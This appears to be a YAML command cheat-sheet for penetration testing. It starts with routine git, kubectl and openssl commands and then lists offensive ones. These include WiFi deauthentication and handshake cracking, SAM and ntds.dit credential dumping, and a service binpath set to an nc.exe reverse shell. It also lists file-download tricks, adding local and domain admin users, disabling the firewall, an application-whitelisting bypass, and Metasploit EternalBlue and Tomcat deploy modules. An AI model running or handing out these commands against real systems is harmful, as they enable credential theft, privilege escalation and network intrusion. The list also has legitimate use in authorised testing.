|
||
desc: Clone a git repository
|
||
- cmd: git remote --verbose
|
||
lang: sh
|
||
tags: pentest
|
||
desc: View all available remote for a git repository
|
||
- cmd: git remote add <remote_name> <remote_url>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Adds a remote for a git repository
|
||
- cmd: git remote rename <old_remote_name> <new_remote_name>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Renames a remote for a git repository
|
||
- cmd: git remote remove <remote_name>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Remove a remote for a git repository
|
||
- cmd: git checkout <branch>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Checkout to branch
|
||
- cmd: git status
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Displays the current status of a git repository
|
||
- cmd: git diff <unstaged_files>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Displays unstaged changes for file
|
||
- cmd: git add <changed_files>;
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Stage single or multiple files
|
||
- cmd: git add -A
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Stage all files in project
|
||
- cmd: git commit -m <message>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Saves the changes to a file in a commit
|
||
- cmd: git push -u <remote_name> <branch_name>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Pushes committed changes to remote repository
|
||
- cmd: git push <remote_name> <branch>:<branch_to_overwrite>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Pushes changes to a remote repository overwriting another branch
|
||
- cmd: git push <remote_name> <branch_name> -f
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Overwrites remote branch with local branch changes
|
||
- cmd: git pull --ff-only
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Pulls changes to a remote repo to the local repo
|
||
- cmd: git merge <branch_name>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Merges changes on one branch into current branch
|
||
- cmd: git merge --abort
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Abort the current conflict resolution process, and try to reconstruct the pre-merge state.
|
||
- cmd: git log
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Displays log of commits for a repo
|
||
- cmd: git log --all --decorate --oneline --graph
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Displays formatted log of commits for a repo
|
||
- cmd: git clean -dxf
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Clear everything
|
||
- cmd: git rebase master -S -f
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Sign all commits in a branch based on master
|
||
- cmd: git fetch origin pull/<pr_number>/head:pr/<pr_number> && git checkout pr/<pr_number>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Checkout a branch from a fork
|
||
- cmd: git submodule add <repository> <path>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Add a new module
|
||
- cmd: git submodule update --init
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Update module
|
||
- cmd: git submodule update
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Update module without init
|
||
- cmd: git submodule foreach git pull origin master
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Pull all submodules
|
||
- cmd: git submodule update --init --recursive
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Update all submodules
|
||
- cmd: git commit --no-verify
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Skip git hooks
|
||
- cmd: git checkout -b <new_branch_name>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Create new branch from current HEAD
|
||
- cmd: git checkout -b <new_branch_name> <remote>/<branch_name>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: pull remote branch and switch to it
|
||
- cmd: gitdumper <url>/.git/ <destination_dir>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: git dump
|
||
- cmd: kubectl config get-contexts
|
||
lang: sh
|
||
tags: kubernetes, k8s, kubectl
|
||
desc: Print all contexts
|
||
- cmd: kubectl config current-context
|
||
lang: sh
|
||
tags: kubernetes, k8s, kubectl
|
||
desc: Print current context of kubeconfig
|
||
- cmd: kubectl config use-context <context>
|
||
lang: sh
|
||
tags: kubernetes, k8s, kubectl
|
||
desc: Set context of kubeconfig
|
||
- cmd: kubectl explain <resource>
|
||
lang: sh
|
||
tags: kubernetes, k8s, kubectl
|
||
desc: Print resource documentation
|
||
- cmd: kubectl get nodes
|
||
lang: sh
|
||
tags: kubernetes, k8s, kubectl
|
||
desc: Get nodes (add option '-o wide' for details)
|
||
- cmd: kubectl get namespaces
|
||
lang: sh
|
||
tags: kubernetes, k8s, kubectl
|
||
desc: Get namespaces
|
||
- cmd: kubectl get pods -n <namespace>
|
||
lang: sh
|
||
tags: kubernetes, k8s, kubectl
|
||
desc: Get pods from namespace (add option '-o wide' for details)
|
||
- cmd: kubectl get pods --all-namespaces
|
||
lang: sh
|
||
tags: kubernetes, k8s, kubectl
|
||
desc: Get pods from all namespace (add option '-o wide' for details)
|
||
- cmd: kubectl get services -n <namespace>
|
||
lang: sh
|
||
tags: kubernetes, k8s, kubectl
|
||
desc: Get services from namespace
|
||
- cmd: kubectl describe <resource>/<name> -n <namespace>
|
||
lang: sh
|
||
tags: kubernetes, k8s, kubectl
|
||
desc: Get details from resource on namespace
|
||
- cmd: kubectl logs -f pods/<name> -n <namespace>
|
||
lang: sh
|
||
tags: kubernetes, k8s, kubectl
|
||
desc: Print logs from namespace
|
||
- cmd: kubectl get deployments -n <namespace>
|
||
lang: sh
|
||
tags: kubernetes, k8s, kubectl
|
||
desc: Get deployments
|
||
- cmd: kubectl edit deployment/<name> -n <namespace>
|
||
lang: sh
|
||
tags: kubernetes, k8s, kubectl
|
||
desc: Edit deployments
|
||
- cmd: kubectl drain <name>
|
||
lang: sh
|
||
tags: kubernetes, k8s, kubectl
|
||
desc: Drain node in preparation for maintenance
|
||
- cmd: kubectl uncordon <name>
|
||
lang: sh
|
||
tags: kubernetes, k8s, kubectl
|
||
desc: Mark node as schedulable
|
||
- cmd: kubectl cordon <name>
|
||
lang: sh
|
||
tags: kubernetes, k8s, kubectl
|
||
desc: Mark node as unschedulable
|
||
- cmd: kubectl top <type>
|
||
lang: sh
|
||
tags: kubernetes, k8s, kubectl
|
||
desc: Display resource (cpu/memory/storage) usage
|
||
- cmd: drupwn --users --nodes --modules --dfiles --themes enum <url>
|
||
lang: sh
|
||
tags: drupal, drupwn
|
||
desc: drupwn classic
|
||
- cmd: sudo docker run --rm -it immunit/drupwn --users --nodes --modules --dfiles --themes enum <url>
|
||
lang: sh
|
||
tags: drupal, drupwn
|
||
desc: drupwn, docker
|
||
- cmd: gobuster dir -u <url> -w <wordlist>
|
||
lang: sh
|
||
tags: fuzzer, fuzz, gobuster
|
||
desc: gobuster scan classic
|
||
- cmd: gobuster dir -u <url> -w <wordlist> -x json,html,php,txt,xml,md
|
||
lang: sh
|
||
tags: fuzzer, fuzz, gobuster
|
||
desc: gobuster scan pentest classic fuzz
|
||
- cmd: gobuster dir -u <url> -w <wordlist> -t 30
|
||
lang: sh
|
||
tags: fuzzer, fuzz, gobuster
|
||
desc: gobuster scan high rate
|
||
- cmd: gobuster dir -u <url> -w <wordlist> -x json,html,php,txt
|
||
lang: sh
|
||
tags: fuzzer, fuzz, gobuster
|
||
desc: gobuster scan with adding extension
|
||
- cmd: wfuzz -z range,1-1000 -u <url>FUZZ
|
||
lang: sh
|
||
tags: fuzzer, fuzz, wfuzz
|
||
desc: 'wfuzz with number on url ( url : http://site/ )'
|
||
- cmd: wfuzz -z file,<file> -u <url>FUZZ
|
||
lang: sh
|
||
tags: fuzzer, fuzz, wfuzz
|
||
desc: 'wfuzz with wordlist on url ( url : http://site/ )'
|
||
- cmd: wfuzz -z file,<file> -X post -u <url> -d 'FUZZ=1'
|
||
lang: sh
|
||
tags: fuzzer, fuzz, wfuzz
|
||
desc: wfuzz on post parameter
|
||
- cmd: dirb <url> -w /usr/share/wordlists/dirb/common.txt
|
||
lang: sh
|
||
tags: fuzzer, fuzz, dirb
|
||
desc: dirb commons
|
||
- cmd: ffuf -w <wordlist> -u <url>/FUZZ
|
||
lang: sh
|
||
tags: fuzzer, fuzz, ffuf
|
||
desc: ffuf fuzz keyword in url
|
||
- cmd: 'ffuf -w <wordlist> -u <url> -H "Host: FUZZ" -fs <response_size>'
|
||
lang: sh
|
||
tags: fuzzer, fuzz, ffuf
|
||
desc: ffuf fuzz Host filter response size
|
||
- cmd: ffuf -w <wordlist> -u <url>?<param>=FUZZ -fs <response_size>
|
||
lang: sh
|
||
tags: fuzzer, fuzz, ffuf
|
||
desc: ffuf GET parameter fuzzing
|
||
- cmd: ffuf -w <wordlist> -u <url> -X POST -d "username=admin\&password=FUZZ" -fc 401
|
||
lang: sh
|
||
tags: fuzzer, fuzz, ffuf
|
||
desc: ffuf POST parameter fuzzing and filter response code 401
|
||
- cmd: nikto -C all -h <url>
|
||
lang: sh
|
||
tags: fuzzer, fuzz, nikto
|
||
desc: nikto - first vuln scan
|
||
- cmd: feroxbuster --url <url>
|
||
lang: sh
|
||
tags: fuzzer, fuzz, ffuf, dirsearch, gobuster, dirb
|
||
desc: default scan
|
||
- cmd: feroxbuster --url <url> -w <wordlist>
|
||
lang: sh
|
||
tags: fuzzer, fuzz, ffuf, dirsearch, gobuster, dirb
|
||
desc: default scan with wordlist
|
||
- cmd: feroxbuster -u <url> -H "<header>" "<header>"
|
||
lang: sh
|
||
tags: fuzzer, fuzz, ffuf, dirsearch, gobuster, dirb
|
||
desc: Multiple headers
|
||
- cmd: feroxbuster -u <proto|https>://[<ipv6>] --no-recursion -vv
|
||
lang: sh
|
||
tags: fuzzer, fuzz, ffuf, dirsearch, gobuster, dirb
|
||
desc: IPv6, non-recursive scan with INFO-level logging enabled
|
||
- cmd: feroxbuster -u <url> --auto-bail
|
||
lang: sh
|
||
tags: fuzzer, fuzz, ffuf, dirsearch, gobuster, dirb
|
||
desc: Abort or reduce scan speed to individual directory scans when too many errors have occurred
|
||
- cmd: 'python3 jwt_tool.py -M at -t "<url>" -rh "Authorization: Bearer <JWT_Token>" -rh "<other_header>" -rc "<cookies>"'
|
||
lang: sh
|
||
tags: jwttool, token, jwt
|
||
desc: Jwt tool Mode all tests
|
||
- cmd: python3 jwt_tool.py -Q "<jwttool_id>"
|
||
lang: sh
|
||
tags: jwttool, token, jwt
|
||
desc: Jwt tool reuse query id
|
||
- cmd: python3 jwt_tool.py -d <wordlists.txt> <JWT_token>
|
||
lang: sh
|
||
tags: jwttool, token, jwt
|
||
desc: Jwt tool bruteforce key
|
||
- cmd: openssl req -new -newkey rsa:<RSA_LENGTH> -nodes -out <OUTPUT_CSR> -keyout <OUTPUT_KEY>
|
||
lang: sh
|
||
tags: openssl, certificate, encryption
|
||
desc: Create a new signing request and key
|
||
- cmd: openssl req -x509 -sha256 -nodes -days <VALIDITY> -newkey rsa:<RSA_LENGTH> -out <OUTPUT_CRT> -keyout <OUTPUT_KEY>
|
||
lang: sh
|
||
tags: openssl, certificate, encryption
|
||
desc: Create a new self-signed certificate
|
||
- cmd: openssl req -out <OUTPUT_CSR> -key <INPUT_KEY> -new
|
||
lang: sh
|
||
tags: openssl, certificate, encryption
|
||
desc: Create a signing request from existing key
|
||
- cmd: openssl x509 -x509toreq -out <OUTPUT_CSR> -in <INPUT_CRT> -signkey <INPUT_KEY>
|
||
lang: sh
|
||
tags: openssl, certificate, encryption
|
||
desc: Create a signing request from existing certificate and key
|
||
- cmd: openssl rsa -in <INPUT_KEY> -out <OUTPUT_PLAINTEXT_KEY>
|
||
lang: sh
|
||
tags: openssl, certificate, encryption
|
||
desc: Remove a passphrase from a private key
|
||
- cmd: openssl x509 -inform der -in <INPUT_CRT> -out <OUTPUT_PEM>
|
||
lang: sh
|
||
tags: openssl, certificate, encryption
|
||
desc: Convert a DER encoded file to a PEM encoded file
|
||
- cmd: openssl x509 -outform der -in <INPUT_PEM> -out <OUTPUT_CRT>
|
||
lang: sh
|
||
tags: openssl, certificate, encryption
|
||
desc: Convert a PEM encoded file to a DER encoded file
|
||
- cmd: openssl pkcs12 -in <INPUT_PKCS12> -out <OUTPUT_PEM> -nodes
|
||
lang: sh
|
||
tags: openssl, certificate, encryption
|
||
desc: Convert a PKCS12 encoded file containing a private key and certificates to PEM
|
||
- cmd: openssl pkcs12 -in <INPUT_PKCS12> -out <OUTPUT_PEM> -nodes -nocerts
|
||
lang: sh
|
||
tags: openssl, certificate, encryption
|
||
desc: Extract the private key from a PKCS12 encoded file
|
||
- cmd: openssl pkcs12 -in <INPUT_PKCS12> -out <OUTPUT_PEM> -nodes -nokeys
|
||
lang: sh
|
||
tags: openssl, certificate, encryption
|
||
desc: Extract the certificate from a PKCS12 encoded file
|
||
- cmd: openssl pkcs12 -export -out <OUTPUT_PKCS12> -inkey <INPUT_KEY> -in <INPUT_CRT> -certfile <INPUT_CRT>
|
||
lang: sh
|
||
tags: openssl, certificate, encryption
|
||
desc: Convert a PEM certificate file and a private key to PKCS12 encoded file
|
||
- cmd: openssl req -text -noout -verify -in <OUTPUT_CSR>
|
||
lang: sh
|
||
tags: openssl, certificate, encryption
|
||
desc: Validate a certificate signing request
|
||
- cmd: openssl rsa -in <INPUT_KEY> -check
|
||
lang: sh
|
||
tags: openssl, certificate, encryption
|
||
desc: Validate a private key
|
||
- cmd: openssl x509 -in <INPUT_CRT> -text -noout
|
||
lang: sh
|
||
tags: openssl, certificate, encryption
|
||
desc: Validate a certificate
|
||
- cmd: openssl pkcs12 -info -in <INPUT_PKCS12>
|
||
lang: sh
|
||
tags: openssl, certificate, encryption
|
||
desc: Validate a PKCS12 file (.pfx or .p12)
|
||
- cmd: openssl x509 -noout -modulus -in <INPUT_CRT> | openssl md5
|
||
lang: sh
|
||
tags: openssl, certificate, encryption
|
||
desc: Compare the MD5 hash of a certificate
|
||
- cmd: openssl rsa -noout -modulus -in <INPUT_KEY> | openssl md5
|
||
lang: sh
|
||
tags: openssl, certificate, encryption
|
||
desc: Compare the MD5 hash of a private key
|
||
- cmd: openssl req -noout -modulus -in <INPUT_CSR> | openssl md5
|
||
lang: sh
|
||
tags: openssl, certificate, encryption
|
||
desc: Compare the MD5 hash of a certificate signing request
|
||
- cmd: openssl s_client -connect <URL>:<PORT>
|
||
lang: sh
|
||
tags: openssl, certificate, encryption
|
||
desc: Display the server certificate chain
|
||
- cmd: msfconsole -x "use auxiliary/scanner/http/tomcat_enum"
|
||
lang: sh
|
||
tags: tomcat
|
||
desc: tomcat manager bruteforce
|
||
- cmd: msfconsole -x "use exploit/multi/http/tomcat_mgr_deploy"
|
||
lang: sh
|
||
tags: tomcat
|
||
desc: tomcat deploy
|
||
- cmd: curl -k -s <url> | grep -o 'http://[^"]*' | cut -d "/" -f 3 | sort -u
|
||
lang: sh
|
||
tags: web
|
||
desc: extract links from an url
|
||
- cmd: sudo docker run -it --network host --rm wpscanteam/wpscan --proxy http://127.0.0.1:8080 --url <url> --disable-tls-checks -e ap,tt,cb,dbe,u1-20,m --api-token <wpscan_apitoken>
|
||
lang: sh
|
||
tags: wpscan, wordpress
|
||
desc: wpscan with docker and burp proxy
|
||
- cmd: airmon-ng check kill
|
||
lang: sh
|
||
tags: pentest
|
||
desc: airmon - Kill processes which can cause trouble
|
||
- cmd: airmon-ng start <wlan_interface>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: airmon - start interface
|
||
- cmd: airmon-ng stop <wlanmon_interface>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: airmon - stop interface
|
||
- cmd: systemctl restart NetworkManager
|
||
lang: sh
|
||
tags: pentest
|
||
desc: NetworkManager - Restart NetworkManager
|
||
- cmd: airodump-ng <wlanmon_interface>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: airodump - listen to everything
|
||
- cmd: airodump-ng --bssid <mac_address> -c <channel> -w <output_file> <wlanmon_interface>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: airodump - listen to specific SSID
|
||
- cmd: aireplay-ng --deauth <deauth_count> -c <client_mac_address> -a <mac_address> <wlanmon_interface>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: aireplay - deauth client
|
||
- cmd: aircrack-ng -w <dictionary> <input_file>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: aircrack - crack handshake for PSK
|
||
- cmd: hostapd-wpe <hostapd_conf>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: hostapd-wpe - launch fake AP
|
||
- cmd: kismet -c <wlan_interface>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: kismet - monitor WiFi
|
||
- cmd: nmcli device set <wlan_interface> managed true
|
||
lang: sh
|
||
tags: pentest
|
||
desc: nmcli - set back WiFi interface to managed mode
|
||
- cmd: reaver -i <wlanmon_interface> -b <mac_address> -c <channel> -Z
|
||
lang: sh
|
||
tags: pentest
|
||
desc: reaver - launch WPS pixiedust attack
|
||
- cmd: hcxdumptool -i <wlanmon_interface> -o capture.pcapng --enable_status=1 -c <channel>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: hcxdumptool - WPA2-PSK PMKID Capture
|
||
- cmd: hcxpcaptool -z test.16800 test.pcapng
|
||
lang: sh
|
||
tags: pentest
|
||
desc: hcxdumptool -
|
||
- cmd: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U <full_path_to_app>
|
||
lang: sh
|
||
tags: application whitelisting, clm
|
||
desc: whitelisting bypass with installutil
|
||
- cmd: systeminfo
|
||
lang: sh
|
||
tags: pentest
|
||
desc: get info system
|
||
- cmd: systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
|
||
lang: sh
|
||
tags: pentest
|
||
desc: get info system limited
|
||
- cmd: findstr /si 'password' *.txt *.xml *.docx
|
||
lang: sh
|
||
tags: pentest
|
||
desc: find passwords
|
||
- cmd: findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
|
||
lang: sh
|
||
tags: pentest
|
||
desc: find passwords - group policy preference (ms14-025)
|
||
- cmd: wmic qfe get Caption,Description,HotFixID,InstalledOn
|
||
lang: sh
|
||
tags: pentest
|
||
desc: get patches
|
||
- cmd: hostname; $env:computername
|
||
lang: sh
|
||
tags: pentest
|
||
desc: get hostname
|
||
- cmd: set
|
||
lang: sh
|
||
tags: pentest
|
||
desc: show environment - List all environment variables
|
||
- cmd: nslookup -type=any <userdnsdomain>.
|
||
lang: sh
|
||
tags: pentest
|
||
desc: dns request for DC
|
||
- cmd: wmic logicaldisk get caption,description,providername
|
||
lang: sh
|
||
tags: pentest
|
||
desc: show mounted disks
|
||
- cmd: dir C:\$Recycle.Bin /s /b
|
||
lang: sh
|
||
tags: pentest
|
||
desc: show recycle bin
|
||
- cmd: wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
|
||
lang: sh
|
||
tags: pentest
|
||
desc: get architecture
|
||
- cmd: schtasks /query /fo LIST /v
|
||
lang: sh
|
||
tags: pentest
|
||
desc: list scheduled tasks
|
||
- cmd: schtasks /query /fo LIST 2>nul | findstr <taskname>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: list one scheduled task
|
||
- cmd: tasklist /V
|
||
lang: sh
|
||
tags: pentest
|
||
desc: list process
|
||
- cmd: tasklist /SVC
|
||
lang: sh
|
||
tags: pentest
|
||
desc: list process and links to started services
|
||
- cmd: net start
|
||
lang: sh
|
||
tags: pentest
|
||
desc: list windows service started (1)
|
||
- cmd: wmic service list brief
|
||
lang: sh
|
||
tags: pentest
|
||
desc: list services (2)
|
||
- cmd: sc query
|
||
lang: sh
|
||
tags: pentest
|
||
desc: list services (3)
|
||
- cmd: dir /a "C:\Program Files"
|
||
lang: sh
|
||
tags: pentest
|
||
desc: list installed software (1)
|
||
- cmd: dir /a "C:\Program Files (x86)"
|
||
lang: sh
|
||
tags: pentest
|
||
desc: list installed software (2)
|
||
- cmd: reg query HKEY_LOCAL_MACHINE\SOFTWARE
|
||
lang: sh
|
||
tags: pentest
|
||
desc: list installed software (3)
|
||
- cmd: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
|
||
lang: sh
|
||
tags: pentest
|
||
desc: show lsa cached credentials value
|
||
- cmd: reg query HKLM /f password /t REG_SZ /s
|
||
lang: sh
|
||
tags: pentest
|
||
desc: register query word password (1)
|
||
- cmd: reg query HKCU /f password /t REG_SZ /s
|
||
lang: sh
|
||
tags: pentest
|
||
desc: register query word password (2)
|
||
- cmd: reg save HKLM\SAM 'C:\Windows\Temp\sam.save'; reg save HKLM\SECURITY 'C:\Windows\Temp\security.save'; reg save HKLM\SYSTEM 'C:\Windows\Temp\system.save'
|
||
lang: sh
|
||
tags: pentest
|
||
desc: register query extract SAM
|
||
- cmd: wmic shadowcopy call create Volume='C:\'
|
||
lang: sh
|
||
tags: pentest
|
||
desc: create shadow copy
|
||
- cmd: vssadmin list shadows
|
||
lang: sh
|
||
tags: pentest
|
||
desc: list shadow copy
|
||
- cmd: accesschk.exe /accepteula -ucqv <service_name>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: check service privilege
|
||
- cmd: sc config <service> binpath= "C:\nc.exe -nv 127.0.0.1 4444 -e C:\WINDOWS\System32\cmd.exe"
|
||
lang: sh
|
||
tags: pentest
|
||
desc: reconfigure service
|
||
- cmd: sc config <service> obj= ".\LocalSystem" password= ""
|
||
lang: sh
|
||
tags: pentest
|
||
desc: change service
|
||
- cmd: net start <service>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: start service
|
||
- cmd: accesschk.exe /accepteula -dqv "<file>"
|
||
lang: sh
|
||
tags: pentest
|
||
desc: check permission (1)
|
||
- cmd: cacls "<file>"
|
||
lang: sh
|
||
tags: pentest
|
||
desc: check permission (2)
|
||
- cmd: accesschk.exe -uwdqs Users <c>:\
|
||
lang: sh
|
||
tags: pentest
|
||
desc: find weak folder permission
|
||
- cmd: accesschk.exe -uwqs Users <c>:\
|
||
lang: sh
|
||
tags: pentest
|
||
desc: find weak file permission
|
||
- cmd: echo var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); WinHttpReq.Send(); WScript.Echo(WinHttpReq.ResponseText); > fu.js && cscript /nologo fu.js <file_url> > <downloaded_file>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: VBS download file script
|
||
- cmd: net user <username> <password> /ADD
|
||
lang: sh
|
||
tags: pentest
|
||
desc: add user
|
||
- cmd: net user <username> <password> /ADD /DOMAIN
|
||
lang: sh
|
||
tags: pentest
|
||
desc: add user to domain
|
||
- cmd: net localgroup administrators <username> /add
|
||
lang: sh
|
||
tags: pentest
|
||
desc: add user as admin
|
||
- cmd: runas /user:<domain>\<user> cmd.exe
|
||
lang: sh
|
||
tags: pentest
|
||
desc: run as over user
|
||
- cmd: whoami /all
|
||
lang: sh
|
||
tags: pentest
|
||
desc: whoami - All info about me, take a look at the enabled tokens
|
||
- cmd: whoami /priv
|
||
lang: sh
|
||
tags: pentest
|
||
desc: whoami privilegied
|
||
- cmd: net users
|
||
lang: sh
|
||
tags: pentest
|
||
desc: list all users
|
||
- cmd: net group "Admins du domaine"
|
||
lang: sh
|
||
tags: pentest
|
||
desc: list domain admins (fr)
|
||
- cmd: net user <username>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: infos about a user
|
||
- cmd: '[wmi] Win32_userAccount.Domain=<computer_name>,Name="Administrator"'
|
||
lang: ps1
|
||
tags: pentest
|
||
desc: infos on a Administrator and retrieve SID
|
||
- cmd: net accounts
|
||
lang: sh
|
||
tags: pentest
|
||
desc: infos about password policy
|
||
- cmd: qwinsta
|
||
lang: sh
|
||
tags: pentest
|
||
desc: who logged in
|
||
- cmd: cmdkey /list
|
||
lang: sh
|
||
tags: pentest
|
||
desc: List credentials
|
||
- cmd: net localgroup
|
||
lang: sh
|
||
tags: pentest
|
||
desc: show local groups
|
||
- cmd: net localgroup <group_name>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: show specific local group
|
||
- cmd: net group /domain <domain_group_name>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: show domain group users
|
||
- cmd: echo %USERDOMAIN%
|
||
lang: sh
|
||
tags: pentest
|
||
desc: get domain name
|
||
- cmd: echo %USERDNSDOMAIN%
|
||
lang: sh
|
||
tags: pentest
|
||
desc: get domain name (2)
|
||
- cmd: systeminfo | findstr /B /C:"Domain"
|
||
lang: sh
|
||
tags: pentest
|
||
desc: get computer domain name (3)
|
||
- cmd: echo %logonserver%
|
||
lang: sh
|
||
tags: pentest
|
||
desc: get name of the DC
|
||
- cmd: set logonserver #Get name of the domain controller
|
||
lang: sh
|
||
tags: pentest
|
||
desc: get name of the dc (2)
|
||
- cmd: net group /domain
|
||
lang: sh
|
||
tags: pentest
|
||
desc: list of domain groups
|
||
- cmd: net group "domain computers" /domain
|
||
lang: sh
|
||
tags: pentest
|
||
desc: list of computer connected to the domain
|
||
- cmd: net view /domain; nltest /dclist:<domain>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: List all PCs of the domain
|
||
- cmd: net group "Domain Controllers" /domain
|
||
lang: sh
|
||
tags: pentest
|
||
desc: list pc accounts of domain controllers
|
||
- cmd: net group "Domain Admins" /domain
|
||
lang: sh
|
||
tags: pentest
|
||
desc: List users with domain admin privileges
|
||
- cmd: net group "Domain Admins" <username> /add /domain
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Add user to domain admin group
|
||
- cmd: net group "Admins du domaine" <username> /add /domain
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Add user to domain admin group - FR
|
||
- cmd: net localgroup administrators /domain
|
||
lang: sh
|
||
tags: pentest
|
||
desc: List users that belongs to the administrators group inside the domain
|
||
- cmd: net user /domain
|
||
lang: sh
|
||
tags: pentest
|
||
desc: List all domain users
|
||
- cmd: net user <username> /domain
|
||
lang: sh
|
||
tags: pentest
|
||
desc: get user domain information
|
||
- cmd: net accounts /domain
|
||
lang: sh
|
||
tags: pentest
|
||
desc: domain password and lockout policy
|
||
- cmd: nltest /domain_trusts
|
||
lang: sh
|
||
tags: pentest
|
||
desc: get mapping of the trust relationships
|
||
- cmd: ipconfig /all
|
||
lang: sh
|
||
tags: pentest
|
||
desc: all interfaces
|
||
- cmd: route print
|
||
lang: sh
|
||
tags: pentest
|
||
desc: print all routes
|
||
- cmd: arp -a; netstat -ano
|
||
lang: sh
|
||
tags: pentest
|
||
desc: list of know hosts
|
||
- cmd: type C:\WINDOWS\System32\drivers\etc\hosts
|
||
lang: sh
|
||
tags: pentest
|
||
desc: show hosts file
|
||
- cmd: dir /a:h <path>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: list hidden files
|
||
- cmd: dir /s /b
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Recursive list
|
||
- cmd: netsh firewall show state
|
||
lang: sh
|
||
tags: pentest
|
||
desc: show firewall state
|
||
- cmd: netsh firewall show config
|
||
lang: sh
|
||
tags: pentest
|
||
desc: show firewall config
|
||
- cmd: netsh Advfirewall set allprofiles state off
|
||
lang: sh
|
||
tags: pentest
|
||
desc: turn off firewall
|
||
- cmd: netsh firewall set opmode disable
|
||
lang: sh
|
||
tags: pentest
|
||
desc: turn off firewall (2)
|
||
- cmd: netsh Advfirewall set allprofiles state on
|
||
lang: sh
|
||
tags: pentest
|
||
desc: turn on firewall
|
||
- cmd: netsh firewall add portopening TCP 3389 "Remote Desktop"
|
||
lang: sh
|
||
tags: pentest
|
||
desc: firewall open port RDP
|
||
- cmd: ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
|
||
lang: sh
|
||
tags: pentest
|
||
desc: dump ntds.dit (Windows >= 2008 server) - method 1
|
||
- cmd: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
|
||
lang: sh
|
||
tags: pentest
|
||
desc: dump ntds.dit (Windows >= 2008 server) - method 2
|
||
- cmd: 'net start vss && vssadmin create shadow /for=c: && vssadmin list shadows && copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\temp'
|
||
lang: sh
|
||
tags: pentest
|
||
desc: dump ntds.dit (Windows <= 2003 server)
|
||
- cmd: net view
|
||
lang: sh
|
||
tags: pentest
|
||
desc: list of computer
|
||
- cmd: net view /all /domain <domain_name>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: list of computer shares on the domain
|
||
- cmd: net view \\<ip> \ALL
|
||
lang: sh
|
||
tags: pentest
|
||
desc: list share of a computer
|
||
- cmd: 'net use x: \\<ip>\<share_name>'
|
||
lang: sh
|
||
tags: pentest
|
||
desc: mount share locally
|
||
- cmd: net share
|
||
lang: sh
|
||
tags: pentest
|
||
desc: check current share
|
||
- cmd: '"c:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\mpcmdrun.exe" -DownloadFile -url <url> -path <result_file>; mpcmdrun.exe -DownloadFile -url <url> -path <result_file>'
|
||
lang: sh
|
||
tags: pentest
|
||
desc: windows download file with windows defender
|
||
- cmd: nmcli dev show <interface>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: find AD IP - show domain name and dns
|
||
- cmd: nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain_name>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: nslookup AD - domain
|
||
- cmd: netdom trust <source_domain> /d:<target_domain> /enablesidhistory:yes
|
||
lang: sh
|
||
tags: pentest
|
||
desc: enable sid history
|
||
- cmd: msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue"
|
||
lang: sh
|
||
tags: pentest
|
||
desc: windows eternal blue - smb - ms17-010 |